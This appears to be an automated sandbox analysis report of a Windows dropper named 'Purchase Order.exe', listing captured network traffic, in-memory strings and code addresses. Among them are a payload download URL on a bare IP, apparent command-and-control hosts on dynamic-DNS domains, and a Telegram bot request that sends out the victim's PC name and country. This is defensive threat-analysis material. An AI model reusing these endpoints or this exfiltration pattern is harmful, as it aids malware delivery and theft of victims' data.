            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.129.16
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2021/10/2024%20/%2017:55:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /efxSlCP242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 21 Oct 2024 09:30:53 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: Purchase Order.exe, 00000004.00000002.3364746506.0000000007E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://84.38.129.16/efxSlCP242.bin
            Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://84.38.129.16/efxSlCP242.binJ
            Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://84.38.129.16/efxSlCP242.binn
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Purchase Order.exe, Purchase Order.exe, 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Purchase Order.exe, 00000000.00000000.2111963143.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Purchase Order.exe, 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Purchase Order.exe, 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Purchase Order.exe, 00000004.00000002.3384062771.000000003692F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.0000000036A17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: Purchase Order.exe, 00000004.00000002.3384062771.00000000369E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Purchase Order.exe, 00000004.00000002.3384062771.000000003687A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.00000000368EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Purchase Order.exe, 00000004.00000002.3384062771.000000003687A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Purchase Order.exe, 00000004.00000002.3384062771.00000000368EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186
            Source: Purchase Order.exe, 00000004.00000002.3384062771.00000000368EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186$
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036A17000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.0000000036A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49988 version: TLS 1.2
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0040524E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040524E

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Purchase Order.exe
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032BF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032BF
            Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Windows\SysWOW64\lamellate.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_004065420_2_00406542
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00404A8D0_2_00404A8D
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_004065424_2_00406542
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_00404A8D4_2_00404A8D
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_001181E04_2_001181E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0011D2CA4_2_0011D2CA
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_001153704_2_00115370
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0011D5994_2_0011D599
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0011CA084_2_0011CA08
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0011EC184_2_0011EC18
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_00115C384_2_00115C38
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0011CD284_2_0011CD28
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0011AD484_2_0011AD48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0011CFF74_2_0011CFF7
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0011F4D04_2_0011F4D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0011F4C64_2_0011F4C6
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_001139F04_2_001139F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_001129EC4_2_001129EC
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0011CA584_2_0011CA58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_00113AA14_2_00113AA1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_0011EC0A4_2_0011EC0A
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_00113E094_2_00113E09
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB10B84_2_39AB10B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB47A84_2_39AB47A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB93984_2_39AB9398
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB17984_2_39AB1798
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB8AA84_2_39AB8AA8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB1E804_2_39AB1E80
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABD5804_2_39ABD580
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABD9CD4_2_39ABD9CD
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABD9D84_2_39ABD9D8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABD9D74_2_39ABD9D7
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABD1284_2_39ABD128
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABD1194_2_39ABD119
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABD5714_2_39ABD571
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB10A74_2_39AB10A7
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABFC884_2_39ABFC88
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABFC984_2_39ABFC98
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB8CC84_2_39AB8CC8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABCCC04_2_39ABCCC0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABCCD04_2_39ABCCD0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABC4204_2_39ABC420
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABC40F4_2_39ABC40F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB00144_2_39AB0014
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABC8694_2_39ABC869
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABC8784_2_39ABC878
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB00404_2_39AB0040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABF8404_2_39ABF840
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB17884_2_39AB1788
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABEF854_2_39ABEF85
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB47984_2_39AB4798
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABEF904_2_39ABEF90
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABF3E84_2_39ABF3E8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABEB284_2_39ABEB28
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB83204_2_39AB8320
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABEB384_2_39ABEB38
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB83104_2_39AB8310
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABE2884_2_39ABE288
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABE6E04_2_39ABE6E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABE6D14_2_39ABE6D1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABDE204_2_39ABDE20
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABDE304_2_39ABDE30
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39ABE2784_2_39ABE278
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39AB1E724_2_39AB1E72
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA8B584_2_39CA8B58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA7D784_2_39CA7D78
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA77204_2_39CA7720
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA1A504_2_39CA1A50
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA41CA4_2_39CA41CA
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA41C84_2_39CA41C8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA5BCF4_2_39CA5BCF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA65C04_2_39CA65C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAF3C04_2_39CAF3C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAD3C14_2_39CAD3C1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA5BD84_2_39CA5BD8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAD3D04_2_39CAD3D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAB3D14_2_39CAB3D1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA15E94_2_39CA15E9
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAB3E04_2_39CAB3E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA15F84_2_39CA15F8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA2FF84_2_39CA2FF8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAE5FF4_2_39CAE5FF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA15F74_2_39CA15F7
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA57804_2_39CA5780
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAE1804_2_39CAE180
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAC1804_2_39CAC180
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAC1904_2_39CAC190
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA11904_2_39CA1190
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA65AF4_2_39CA65AF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA11A04_2_39CA11A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA2BA14_2_39CA2BA1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA2BB04_2_39CA2BB0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAF3B14_2_39CAF3B1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA0D484_2_39CA0D48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA27484_2_39CA2748
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA8B494_2_39CA8B49
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CACF404_2_39CACF40
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAAF404_2_39CAAF40
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA0D474_2_39CA0D47
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA27584_2_39CA2758
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAAF504_2_39CAAF50
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA57734_2_39CA5773
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAE1704_2_39CAE170
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA23004_2_39CA2300
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CABD004_2_39CABD00
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA531F4_2_39CA531F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA77114_2_39CA7711
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA53284_2_39CA5328
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CACF2F4_2_39CACF2F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAEF204_2_39CAEF20
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA0D384_2_39CA0D38
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAEF304_2_39CAEF30
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA72CA4_2_39CA72CA
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA72C84_2_39CA72C8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAAAC04_2_39CAAAC0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA4ED04_2_39CA4ED0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAA0D04_2_39CAA0D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAA0E04_2_39CAA0E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CADCE04_2_39CADCE0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CADCF04_2_39CADCF0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA08F04_2_39CA08F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CABCF04_2_39CABCF0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA22F14_2_39CA22F1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAEA8F4_2_39CAEA8F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA04984_2_39CA0498
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA1E984_2_39CA1E98
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CACA9F4_2_39CACA9F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA1EA84_2_39CA1EA8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAAAAF4_2_39CAAAAF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAEAA04_2_39CAEAA0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CACAB04_2_39CACAB0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAD84F4_2_39CAD84F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA00404_2_39CA0040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CA1A404_2_39CA1A40
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAF8404_2_39CAF840
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4_2_39CAB85F4_2_39CAB85F
